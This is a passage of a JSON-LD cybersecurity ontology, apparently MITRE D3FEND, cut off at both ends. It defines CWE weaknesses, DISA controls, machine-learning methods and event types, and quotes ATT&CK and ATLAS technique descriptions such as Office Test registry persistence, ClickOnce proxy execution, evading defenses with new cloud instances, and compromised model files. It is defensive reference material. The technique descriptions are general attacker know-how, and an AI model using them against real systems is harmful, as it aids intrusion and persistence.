      "rdfs:isDefinedBy": {
        "@id": "dbr:Local_area_network"
      },
      "rdfs:label": "Wide Area Network",
      "rdfs:subClassOf": {
        "@id": "d3f:Network"
      },
      "skos:altLabel": "WAN"
    },
    {
      "@id": "d3f:updates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x updates y: The technique x updates the software for component y.",
      "rdfs:label": "updates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:hardens"
        },
        {
          "@id": "d3f:modifies"
        }
      ]
    },
    {
      "@id": "d3f:ElectromagneticSignal",
      "@type": "owl:Class",
      "d3f:definition": "An electromagnetic wave that carries information.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Signal"
      },
      "rdfs:label": "Electromagnetic Signal",
      "rdfs:subClassOf": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:CWE-359",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-359",
      "d3f:definition": "The product does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected.",
      "d3f:synonym": [
        "Privacy leak",
        "Privacy leakage",
        "Privacy violation"
      ],
      "rdfs:label": "Exposure of Private Personal Information to an Unauthorized Actor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:DecisionTreeRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DTR",
      "d3f:definition": "Decision Trees Regression is asupervised learning method with the goal  to create a model that predicts the value of a target variable by learning simple decision rules inferred from the data features",
      "d3f:kb-article": "## References\nscikit-learn. (n.d.). Decision Trees. [Link](https://scikit-learn.org/stable/modules/tree.html#tree)",
      "rdfs:label": "Decision Tree Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:HardwareDeviceUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing updates or changes to a device's configuration, properties, or state, including firmware updates, reconfigurations, or optimizations.",
      "rdfs:label": "Hardware Device Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:N7756a2f5dc524a25aa579e1e74512cec"
        }
      ]
    },
    {
      "@id": "_:N7756a2f5dc524a25aa579e1e74512cec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceConnectionEvent"
      }
    },
    {
      "@id": "d3f:StorageImage",
      "@type": "owl:Class",
      "d3f:definition": "A storage image is a complete, encapsulated representation of a storage medium or system environment. It contains all the data, files, and configurations necessary to replicate or deploy a specific system state or software setup.",
      "rdfs:label": "Storage Image",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputingImage"
        },
        {
          "@id": "d3f:File"
        }
      ]
    },
    {
      "@id": "d3f:T1127.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1127.002",
      "d3f:definition": "Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)",
      "rdfs:label": "ClickOnce",
      "rdfs:subClassOf": {
        "@id": "d3f:T1127"
      }
    },
    {
      "@id": "d3f:OTDownloadControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a remote device to download a control program.",
      "d3f:modifies": {
        "@id": "d3f:OTControlProgram"
      },
      "d3f:synonym": "OT Program Download",
      "rdfs:comment": "GE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)",
      "rdfs:label": "OT Download Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://attack.mitre.org/techniques/T0843/"
        },
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommand"
        },
        {
          "@id": "_:N205d82aa82844a13b77eb89a907e1dfb"
        }
      ]
    },
    {
      "@id": "_:N205d82aa82844a13b77eb89a907e1dfb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:Distribution-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DBC",
      "d3f:definition": "Distribution-based clustering creates and groups data points based on their likely hood of belonging to the same probability distribution (Gaussian, Binomial, etc.) in the data.",
      "d3f:kb-article": "## References\nAnalytixLabs. (n.d.). Types of Clustering Algorithms. [Link](https://www.analytixlabs.co.in/blog/types-of-clustering-algorithms/#:~:text=Distribution-Based)",
      "rdfs:label": "Distribution-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:CCI-001436_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization disables organization-defined networking protocols within the information system deemed to be nonsecure except for explicitly identified components in support of specific operational requirements.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001436"
    },
    {
      "@id": "d3f:TransportLayerEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event occurring at the transport layer, responsible for end-to-end communication and data transfer management.",
      "rdfs:label": "Transport Layer Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkEvent"
      }
    },
    {
      "@id": "d3f:T1033",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1033",
      "d3f:definition": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "d3f:may-access": [
        {
          "@id": "d3f:DirectoryService"
        },
        {
          "@id": "d3f:GetSystemConfigValue"
        },
        {
          "@id": "d3f:PasswordFile"
        },
        {
          "@id": "d3f:ProcessSegment"
        }
      ],
      "d3f:may-invoke": [
        {
          "@id": "d3f:CopyToken"
        },
        {
          "@id": "d3f:CreateProcess"
        }
      ],
      "rdfs:label": "System Owner/User Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N219c34c7ba8a46f9af7bbb94cb8725ab"
        },
        {
          "@id": "_:N17520f889f34440c915b0e8d83865bac"
        },
        {
          "@id": "_:Nbde8160a493b4864bb0aa898dfaf15c6"
        },
        {
          "@id": "_:Na52e0639993f431cb3a772fa8419b741"
        },
        {
          "@id": "_:N5f73821e9c374d0f9a1bd5f06ff3f46e"
        },
        {
          "@id": "_:Nd278a0172b194d459bad240b526b39ab"
        }
      ]
    },
    {
      "@id": "_:N219c34c7ba8a46f9af7bbb94cb8725ab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DirectoryService"
      }
    },
    {
      "@id": "_:N17520f889f34440c915b0e8d83865bac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemConfigValue"
      }
    },
    {
      "@id": "_:Nbde8160a493b4864bb0aa898dfaf15c6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PasswordFile"
      }
    },
    {
      "@id": "_:Na52e0639993f431cb3a772fa8419b741",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:N5f73821e9c374d0f9a1bd5f06ff3f46e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CopyToken"
      }
    },
    {
      "@id": "_:Nd278a0172b194d459bad240b526b39ab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:T1097",
      "@type": "owl:Class",
      "d3f:attack-id": "T1097",
      "d3f:definition": "Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1550.003",
      "rdfs:label": "Pass the Ticket",
      "rdfs:seeAlso": {
        "@id": "d3f:T1550.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0010.003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.003",
      "d3f:definition": "AI-enabled systems often rely on open sourced models in various ways.\nMost commonly, the victim organization may be using these models for fine tuning.\nThese models will be downloaded from an external source and then used as the base for the model as it is tuned on a smaller, private dataset.\nLoading models often requires executing some saved code in the form of a saved model file.\nThese can be compromised with traditional malware, or through some adversarial AI techniques.",
      "rdfs:label": "Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "Model"
    },
    {
      "@id": "d3f:UserAccountPasswordResetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account's password is reset, typically due to a forgotten password or administrative action.",
      "rdfs:label": "User Account Password Reset Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Nd39c6a24e7ab48649c7103e5563f12ff"
        },
        {
          "@id": "_:N57b0c5ac828b4e64b9bf06c6c7c28ff3"
        }
      ]
    },
    {
      "@id": "_:Nd39c6a24e7ab48649c7103e5563f12ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "_:N57b0c5ac828b4e64b9bf06c6c7c28ff3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:CCI-000027_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces dynamic information flow control based on organization-defined policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000027"
    },
    {
      "@id": "d3f:Boosting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BOO",
      "d3f:definition": "Boosting is a sequential process where each subsequent model attempts to correct the errors of the previous model",
      "d3f:kb-article": "## How it works\nBoosting consists of using sequentially weak learners where each iteration’s training focuses on previously misclassified instances in order to improve on the previous iteration. This process is continued iteratively until the final prediction is made by aggregating the previous predictions.\n\n## Considerations\nBoosting can be computationally expensive, prone to overfitting, and slower to train compared to other ensemble methods.\n\nThere are three main types of Boosting algorithms\n - Adaptive Boosting\nAdaptive Boosting (sometimes called AdaBoost) works by adding equal importance to each piece of a dataset and running it through the base learning algorithms. Every algorithm that errors, the boosting algorithm assigns a higher importance to. This continues until an acceptable level of confidence is reached.\n - Gradient Boosting\nGradient Boosting starts by training multiple models simultaneously to gather a strong estimate of strength to build new base learning algorithms.\n - XGBoosting\nXGBoosting is a scalable tree boosting model. Using decision trees, weight is assigned to each variable and put into a decision tree. Outputs that are classified by the algorithm as wrong or weak are put into a second decision tree and the results form a stronger model.\n\n## References\nSciencedirect. (n.d.). Semi-supervised learning: An overview. [Link](https://www.sciencedirect.com/science/article/pii/S1319157823000228)",
      "rdfs:label": "Boosting",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-141",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-141",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as parameter or argument delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Parameter/Argument Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:OTControlFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:OTLogicVariable"
      },
      "d3f:definition": "A function which accesses OT Control Variables",
      "rdfs:label": "OT Control Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Nfbb1b6e07da24779bfe8d576c2f6d699"
        }
      ]
    },
    {
      "@id": "_:Nfbb1b6e07da24779bfe8d576c2f6d699",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "d3f:T1596",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596",
      "d3f:definition": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)",
      "rdfs:label": "Search Open Technical Databases",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:HomogenousTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HTL",
      "d3f:definition": "In homogeneous transfer learning, the feature spaces of the source and target domains is of the same dimension (Ds = Dt) while the data of both domains is represented by the same attributes (Xs = Xt) and labels (Ys = Yt). Thus, homogeneous transfer learning aims to bridge the gap in the data distributions experienced during cross-domain transfer.",
      "d3f:kb-article": "## References\nKhalil, K., Asgher, U., & Ayaz, Y. (2022). Novel fNIRS study on homogeneous symmetric feature-based transfer learning for brain-computer interface. Scientific Reports, 12, 3198. [Link](https://www.nature.com/articles/s41598-022-06805-4).",
      "rdfs:label": "Homogenous Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:TransferLearning"
      }
    },
    {
      "@id": "d3f:T1023",
      "@type": "owl:Class",
      "d3f:attack-id": "T1023",
      "d3f:definition": "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.009",
      "rdfs:label": "Shortcut Modification",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.009"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:Reference-Database_for_receiving_storing_and_compiling_information_about_email_messages",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20050091319A1/"
      },
      "d3f:kb-author": "Steven Kirsch",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DomainNameReputationAnalysis"
        },
        {
          "@id": "d3f:IPReputationAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Database for receiving, storing and compiling information about email messages",
      "rdfs:label": "Reference - Database for receiving, storing and compiling information about email messages"
    },
    {
      "@id": "d3f:T1578.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.002",
      "d3f:creates": [
        {
          "@id": "d3f:CloudInstanceMetadata"
        },
        {
          "@id": "d3f:Host"
        }
      ],
      "d3f:definition": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)",
      "rdfs:label": "Create Cloud Instance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:Nfa58cbc87f4744d39fc78b9fabc60e01"
        },
        {
          "@id": "_:N7b54545c497347cd9bee396fb753418e"
        }
      ]
    },
    {
      "@id": "_:Nfa58cbc87f4744d39fc78b9fabc60e01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudInstanceMetadata"
      }
    },
    {
      "@id": "_:N7b54545c497347cd9bee396fb753418e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:T1595.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1595.002",
      "d3f:definition": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.",
      "rdfs:label": "Vulnerability Scanning",
      "rdfs:subClassOf": {
        "@id": "d3f:T1595"
      }
    },
    {
      "@id": "d3f:CopyMemoryFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:copies": {
        "@id": "d3f:MemoryBlock"
      },
      "d3f:definition": "Copies a memory block from one location to another.",
      "rdfs:label": "Copy Memory Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Ndf81f6a954754f648ec2d4dc318cbf10"
        }
      ]
    },
    {
      "@id": "_:Ndf81f6a954754f648ec2d4dc318cbf10",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:AuthenticationFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:UserAccount"
      },
      "d3f:definition": "Authenticates a user account by verifying a presented credential.",
      "rdfs:label": "Authentication Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Na70a95dd5c08487cb3d9ae862c975d1d"
        }
      ]
    },
    {
      "@id": "_:Na70a95dd5c08487cb3d9ae862c975d1d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CWE-511",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-511",
      "d3f:definition": "The product contains code that is designed to disrupt the legitimate operation of the product (or its environment) when a certain time passes, or when a certain logical condition is met.",
      "rdfs:label": "Logic/Time Bomb",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-506"
      }
    },
    {
      "@id": "d3f:EmailReceiveEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an email is delivered to a recipient's mail server or mailbox. This includes receiving messages from internal or external sources via protocols such as IMAP, POP3, or their secure variants.",
      "rdfs:label": "Email Receive Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EmailEvent"
        },
        {
          "@id": "_:Ne299314e5dfd4006a6beba24af4be2cf"
        }
      ]
    },
    {
      "@id": "_:Ne299314e5dfd4006a6beba24af4be2cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EmailSendEvent"
      }
    },
    {
      "@id": "d3f:Reference-TenablePassiveNetworkMonitoring",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.tenable.com/sites/default/files/solution-briefs/SB-Passive-Network-Monitoring.pdf"
      },
      "d3f:kb-abstract": "Tenable Nessus® Network Monitor (NNM), a passive monitoring sensor, continuously discovers active assets on the network and assesses them for vulnerabilities. NNM is based on patented network discovery and vulnerability analysis technology that continuously monitors and profiles non-intrusively. It monitors IPv4, IPv6 and mixed network traffic at the packet layer to determine topology, services and vulnerabilities.",
      "d3f:kb-organization": "Tenable",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DirectPhysicalLinkMapping"
        },
        {
          "@id": "d3f:PassiveLogicalLinkMapping"
        }
      ],
      "d3f:kb-reference-title": "Tenable Passive Network Monitoring",
      "rdfs:label": "Reference - Tenable Passive Network Monitoring"
    },
    {
      "@id": "d3f:UserAccountEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing operations or state changes performed on user accounts, including lifecycle management, access control modifications, and policy assignments.",
      "rdfs:label": "User Account Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/account_change"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Ne5c8459ff15a40afb57fb4eaf1e80c82"
        }
      ]
    },
    {
      "@id": "_:Ne5c8459ff15a40afb57fb4eaf1e80c82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:ServiceEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the activation of a service application, allowing it to start and provide its background or networked functionality.",
      "rdfs:label": "Service Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEnableEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:N988e4e120dd54a5a879503f2480bcf65"
        }
      ]
    },
    {
      "@id": "_:N988e4e120dd54a5a879503f2480bcf65",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceInstallationEvent"
      }
    },
    {
      "@id": "d3f:T1583.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.006",
      "d3f:definition": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
      "rdfs:label": "Web Services",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:M1013",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "A future release of D3FEND will define a taxonomy of Source Code Hardening Techniques.",
      "rdfs:label": "Application Developer Guidance"
    },
    {
      "@id": "d3f:Reference-ProtectedComputingEnvironment_MicrosoftTechnologyLicensingLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20060242406A1"
      },
      "d3f:kb-abstract": "A method of establishing a protected environment within a computing device including validating a kernel component loaded into a kernel of the computing device, establishing a security state for the kernel based on the validation, creating a secure process and loading a software component into the secure process, periodically checking the security state of the kernel, and notifying the secure process when the security state of the kernel has changed.",
      "d3f:kb-author": "Sumedh Barde, Jonathan Schwartz, Reid Kuhn, Alexandre Grigorovitch, Kirt Debique, Chadd Knowlton, James Alkove, Geoffrey Dunbar, Michael Grier, Ming Ma, Chaitanya Upadhyay, Adil Sherwani, Arun Kishan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft Technology Licensing LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:DriverLoadIntegrityChecking"
      },
      "d3f:kb-reference-title": "Protected computing environment",
      "rdfs:label": "Reference - Protected computing environment - Microsoft Technology Licensing LLC"
    },
    {
      "@id": "d3f:T1137.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1137.002",
      "d3f:definition": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Office Test",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:N2b08c17c1a834496b4887e0fbafee469"
        }
      ]
    },
    {
      "@id": "_:N2b08c17c1a834496b4887e0fbafee469",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:Reference-GuidetoOTSecurity",
      "@type": "owl:NamedIndividual"
    },
    {
      "@id": "d3f:T1016.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1016.001",
      "d3f:definition": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.",
      "rdfs:label": "Internet Connection Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:T1016"
      }
    },
    {
      "@id": "d3f:T1566.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1566.004",
      "d3f:definition": "Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.",
      "rdfs:label": "Spearphishing Voice",
      "rdfs:subClassOf": {
        "@id": "d3f:T1566"
      }
    },
    {
      "@id": "d3f:Reference-HeuristicBotnetDetection_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160156644A1"
      },
      "d3f:kb-abstract": "In some embodiments, heuristic botnet detection is provided. In some embodiments, heuristic botnet detection includes monitoring network traffic to identify suspicious network traffic; and detecting a bot based on a heuristic analysis of the suspicious network traffic behavior using a processor, in which the suspicious network traffic behavior includes command and control traffic associated with a bot master. In some embodiments, heuristic botnet detection further includes assigning a score to the monitored network traffic, in which the score corresponds to a botnet risk characterization of the monitored network traffic (e.g., based on one or more heuristic botnet detection techniques); increasing the score based on a correlation of additional suspicious behaviors associated with the monitored network traffic (e.g., based on one or more heuristic botnet detection techniques); and determining the suspicious behavior is associated with a botnet based on the score.",
      "d3f:kb-author": "Xinran Wang; Huagang Xie",
